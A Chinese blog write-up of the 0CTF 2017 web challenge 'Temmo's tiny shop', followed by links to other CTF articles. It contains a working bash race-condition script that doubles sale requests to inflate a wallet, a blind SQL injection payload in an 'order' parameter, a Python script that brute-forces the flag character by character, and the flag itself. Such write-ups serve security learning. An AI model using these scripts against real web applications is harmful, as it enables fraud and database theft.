Writeup for 0CTF2017 web

最新推荐文章于 2023-10-16 14:55:02 发布
最新推荐文章于 2023-10-16 14:55:02 发布
阅读量1.8k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 0CTF Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/segOt/article/details/66477728
版权

2017年0CTF,WEB部分题目的Writeup。

Temmo’s tiny shop

本题首先要获取!HINT!,但是初始钱包里只有4000,而HINT要价8000,此处使用条件竞争(race condition)这一漏洞来提升wallet的数值。利用两个浏览器登录同一账号,使用两个COOKIE来同时进行售卖的动作,则会进行两次售卖动作。bash代码如下

#!/bin/bash
cookie1="PHPSESSID=m19tgi4tq3eptm53pss14dc910"
cookie2="PHPSESSID=39083e7nft6kbvkjvph29socb0"

url="http://202.120.7.197/app.php"

curl "$url?action=buy&id=2" -b $cookie1
curl "$url?action=sale&id=2" -b $cookie1 &
curl "$url?action=sale&id=2" -b $cookie2

得到HINT的提示:

OK! Now I will give some hint: you can get flag by use `select flag from ce63e444b0d049e9c899c9a0336b3c59`

接下来便是sql注入,注入点在search功能的order参数上,可以这样构造

http://202.120.7.197/app.php?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1)like(0x00),price,name)

因为没有回显,对flag进行逐个字符的爆破,遍历ascii码表,通过返回内容中商品的顺序来判断每个字符的值。python代码如下:

#!/usr/bin/python
import requests


url = "http://202.120.7.197/app.php"

param = "?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),{},1)like({}),price,name)"

headers = {"Cookie" : "PHPSESSID=39083e7nft6kbvkjvph29socb0"}
answer=''

for i in range(40):
    for j in range(128):
        if j == 37:
            continue
        content = requests.get(url+param.format(str(i), hex(j)), headers=headers).content
        print param.format(str(i), hex(j))
        print content
        if content.find('"id":"6"') < content.find('"id":"3"'):
            answer += chr(j)
            print chr(j)
            break

print answer

可以得到flag

FLAG_R4CE_C0NDITI0N_I5_EXCITED_

OVER~

segOt
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于HTTP的挑战从端口8000开始,tcp挑战从端口9000开始 如果您不熟悉Docker,则在本文档底部介绍两个用于安装docker的选项。 挑战性 现场挑战标有* 挑战名称 类别 点数 easyauth 网页 30 大号1 网页 20 尊宝2 网页 100 zumboa 3 网页 250 德尔福状态 加密/网络 250 2000年 网页 100 简单的 倒车 10 船长 倒车 75 船长2 倒车 200 撤防 倒车 400 标记接收器 移动/倒车
【i春秋 CTF大本营 > 竞赛训练营 > CTF训练】—— Writeup 题解 (按答对人数排序)
algae
08-05 709
待补充整理ing
CTF模式
haoshangguan的博客
10-12 1419
CTF竞赛模式具体分为以下几类: 正文 理论知识 理论题多见于国内比赛,通常为选择题。包含单选及多选,选手需要根据自己所学的相关理论知识进行作答。最终得出分数。理论部分通常多见于初赛或是初赛之前的海选 Jeopardy-解题 参赛队伍可以通过互联网或者现场网络参与,参数队伍通过与在线环境交互或文件离线分析,解决网络安全技术挑战获取相应分值,类似于 ACM 编程竞赛、信息学奥林匹克赛,根据总分和时间来进行排名。 不同的是这个解题模式一般会设置 一血(First Blood) 、 二血(Second Blood
网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
网络安全
03-27 8556
对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.ne...
通过python爬虫获取ctftime的ctf比赛时间(详解+源码)
Ciyaso的博客
08-28 1647
查看结果 源码在最下面,但如果真正想要学习python爬虫或者想要了解我的思路的人,我希望可以耐心看完我的详细解读,不然这些代码永远不属于你 正在进行的比赛 即将开始的比赛 制作过程 爬取思路 首先我们访问ctftime 圈出的地方就是正在进行的ctf的比赛和即将进行的ctf比赛的信息 查看可以看到这个主页并没有给出相关比赛网址,只有比赛名称和比赛时间 访问一个网站看看 发现详细网页中有所有我们想要的信息,我们可以通过爬取每一个详细网站来获取信息。 最后找到了规律,每一个详细网站都是由下面的方式组
ctf-web-newphp
god_001的博客
04-30 608
题目地址:跳转提示 打开题目网址后,发现出现一段php代码: <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; } pu.
ctfshow baby杯 六一快乐 部分MISC WriteUp
mumuzi的博客
06-02 3768
baby baby babyLSB 首解:zsteg+reverse+猜测 然后猜了个LSB ctfshow{WeiShenMeBuYaoLSB} 预期: 因为用stegsolve的时候g通道发现有内容 就怀疑是围了一圈,写个脚本: from PIL import Image img = Image.open("flag1.png") w,h = img.size[0],img.size[1] t1=t2=t3=t4=flag = '' for i in range(w): p = img.
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
writeup:CTF挑战撰写
05-28
:0 CTF / TCTF 2019 Quals Writeup :强网杯线上赛 :Defcon中国CTF(BCTF)1.0撰写 :MTP撰写 :TokyoWesterns CTF 5th 2019 WriteUp :HITCON CTF 2019 :简易PHP UAF :BroadcastTest :2020 de1ctf...
ctf-writeup:一些ctf游戏文章
07-14
###writeup 一些 ctf 游戏
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
CTF基础知识
m0_65849838的博客
04-26 5942
文章目录一. CTF简介1.开启题目并点击题目附件2.得到正文和flag①正文②FLAG二.竞赛模式1.开启题目并点击题目附件2.正文和flag①正文理论知识Jeopardy-解题AwD-攻防模式AWP-攻防增强RHG-自动化[ AI自动化]RW-真实世界KoH-抢占山头Mix[混合]②flag三.比赛形式1.开启题目并点击题目附件2.正文和flag①正文线上线下②flag四.题目1.开启题目并点击题目附件二.正文和flag①正文WebPwnReverseCryptoMisc②flag 一. CTF简介 1
0ctf writeup
weixin_34384915的博客
03-08 1819
felixk3y · 2016/03/17 10:24Author:双螺旋安全研究院0x00 Rand_2(web)访问http://202.120.7.202:8888/,即可获取到题目的源码:#!php &lt;?php include('config.php'); session_start(); if($_SESSION['time'] &amp;&amp; time() - $_...
CTF杂项总结
夏日 の blog
02-01 1万+
目录 一、流量分析篇 二、文件头篇 三、压缩包篇 四、图片隐写篇 五、音频隐写篇 六、视频隐写 七、取证 八、Other 参考文章: 一、流量分析篇 通常比赛中会提供一个包含流量数据的 PCAP 文件,有时候也会需要选手们先进行修复或重构传输文件后,再进行分析。 PCAP 这一块作为重点考察方向,复杂的地方在于数据包里充满着大量无关的流量信息,因此如何分类和过滤数据是参赛者...
CTF网络安全大赛介绍
Innocence_0的博客
07-15 1732
CTF竞赛模式分为以下三类:一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。
一篇文章带你入门CTF(含工具与资源)
weixin_55154866的博客
10-16 266
CTF(夺旗赛)有助提升安全技术,可为公司企业和组织机构发现安全人才。运用这些工具和框架设计并举行自己的CTF活动吧!知己知彼百战不殆。想要阻止网络攻击者,就得像网络攻击者那样思考。这是一种需要实践的技术,为了得到这种实践,业界创办了各种CTF比赛,同台竞技,比拼谁能更快更好地拿下服务器,赢取黑客技术名声。不久以前,这种活动的名声和合法性还令人质疑。如今,即便参赛者多以化名参加,且扮演反派入侵者的角色,CTF也是全然公开而备受推崇的了。企业安全人员参加CTF是一场白帽子的双赢活动。
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3654
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
记一次CTF过程(Writeup)
热门推荐
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
CTF 简介 竞赛流程 知识点 学习攻略
SKPrimin的博客
08-05 1706
CTF 简介 CTF竞赛流程 参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为"Flag”。 单兵作战 理论、杂项、 web、pwn、逆向等各种题目 综合靶场 团队形式,攻击相同环境的靶机 主要是web题型 只需攻击不用防御针对同一个环境,越早拿到flag,获取的分数越高一台靶机通常会有多个flag flag通常放在web根目录、桌面、C盘根目录、C:\windows
ctf web知识点 markdown
最新发布
11-24
CTF Web 中,我们经常需要使用 Markdown 来编写 Writeup 或记录漏洞分析过程。了解如何使用 Markdown 的编辑器、插件或在线平台可以更快地编写文档并且更好地展示我们的成果。 综上所述,掌握 Markdown 的知识点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值